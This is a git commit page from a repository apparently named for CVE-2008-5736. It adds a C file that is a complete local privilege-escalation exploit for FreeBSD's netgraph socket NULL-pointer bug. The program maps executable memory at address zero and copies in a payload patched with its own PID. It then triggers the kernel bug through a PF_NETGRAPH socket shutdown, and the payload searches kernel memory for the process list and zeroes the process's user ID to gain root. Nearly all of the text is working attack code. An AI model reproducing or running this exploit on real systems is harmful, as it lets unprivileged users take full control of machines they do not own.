diff options
| author |   Adam Weiss <adam@signal11.com> | 2011-02-26 21:15:01 -0500 |
|---|---|---|
| committer | Adam Weiss <adam@signal11.com> | 2011-02-26 21:15:01 -0500 |
| commit | 71c0068b8a7ea89731fcd074a273a77671be08d1 (patch) | |
| tree | fbdd14efa09e23c858616e91744fc87c7526d093 | |
| parent | Import Don Bailey's original exploit code. (diff) | |
| download | CVE-2008-5736-71c0068b8a7ea89731fcd074a273a77671be08d1.tar.xz CVE-2008-5736-71c0068b8a7ea89731fcd074a273a77671be08d1.zip | |
Instead of going to a fixed place, as Don does, search the entire kernel for the locks that are commonly before allproc.
| -rw-r--r-- | search-allproc.c | 148 |
1 files changed, 148 insertions, 0 deletions
diff --git a/search-allproc.c b/search-allproc.c new file mode 100644 index 0000000..aa8e1a7 --- /dev/null +++ b/search-allproc.c @@ -0,0 +1,148 @@ +#include <sys/param.h> +#include <sys/mman.h> +#include <sys/time.h> +#include <sys/stat.h> +#include <sys/proc.h> +#include <sys/types.h> +#include <sys/socket.h> +#include <netgraph/ng_socket.h> +#include <unistd.h> +#include <stdlib.h> +#include <stdio.h> +#include <errno.h> + +#define PAGES 1 +#define PATTERN1 0x8f8f8f8f +#define PATTERN2 0x6e6e6e6e + +typedef unsigned long ulong; +typedef unsigned char uchar; + +int +x(void) +{ + struct proc * p = 0x0; + uint * i; + uint *base = (uint *)0xc0000000; + + while(1) + { + if ( + /* allproc_lock */ + (*base & 0xc0000000) == 0xc0000000 && + (*(base+1) & 0xc0000000) == 0xc0000000 && + (*(base+2) & 0xc0000000) == 0xc0000000 && + (*(base+3) == 0x003b0000) && + (*(base+7) == 0x00000001) && + /* proctree_lock */ + (*(base+16) & 0xc0000000) == 0xc0000000 && + (*(base+17) & 0xc0000000) == 0xc0000000 && + (*(base+18) & 0xc0000000) == 0xc0000000 && + (*(base+19) == 0x003b0000) && + (*(base+23) == 0x00000001) && + /* pargs_ref_lock */ + (*(base+32) & 0xc0000000) == 0xc0000000 && + (*(base+33) & 0xc0000000) == 0xc0000000 && + (*(base+34) & 0xc0000000) == 0xc0000000 && + (*(base+35) == 0x00030000) && + (*(base+39) == 0x00000004) && + /* ppeers_lock */ + (*(base+48) & 0xc0000000) == 0xc0000000 && + (*(base+49) & 0xc0000000) == 0xc0000000 && + (*(base+50) & 0xc0000000) == 0xc0000000 && + (*(base+51) == 0x00030000) && + (*(base+55) == 0x00000004) && + /* allproc */ + (*(base+57) & 0xc0000000) == 0xc0000000 && + (*(base+58) == 0x0) ) + { + base = base+57; + break; + } + base++; + } + + p = (struct proc *)base; + + while(1) + { + if(p->p_pid == PATTERN2) + { + i = (uint * )p->p_ucred; + *++i = 0; + break; + } + + p = p->p_list.le_next; + } + + return 1; +} + +int +main(int argc, char * argv[]) +{ + ulong addr; + uchar * c; + uchar * d; + uint * i; + void * v; + int pid; + int s; + + v = mmap( + NULL, + (PAGES*PAGE_SIZE), + PROT_READ|PROT_WRITE|PROT_EXEC, + MAP_ANON|MAP_FIXED, + -1, + 0); + if(v == MAP_FAILED) + { + perror("mmap"); + return 0; + } + + c = v; + d = (uchar * )x; + while(1) + { + *c = *d; + if(*d == 0xc3) + { + break; + } + + d++; + c++; + } + + *c++ = 0xc3; + + + c=v; + pid = getpid(); + while(1) + { + if(*(long * )c == PATTERN2) + { + *(c + 0) = pid >> 0; + *(c + 1) = pid >> 8; + *(c + 2) = pid >> 16; + *(c + 3) = pid >> 24; + break; + } + c++; + } + + s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA); + if(s < 0) + { + perror("socket"); + return 1; + } + + shutdown(s, SHUT_RDWR); + + return 0; +} |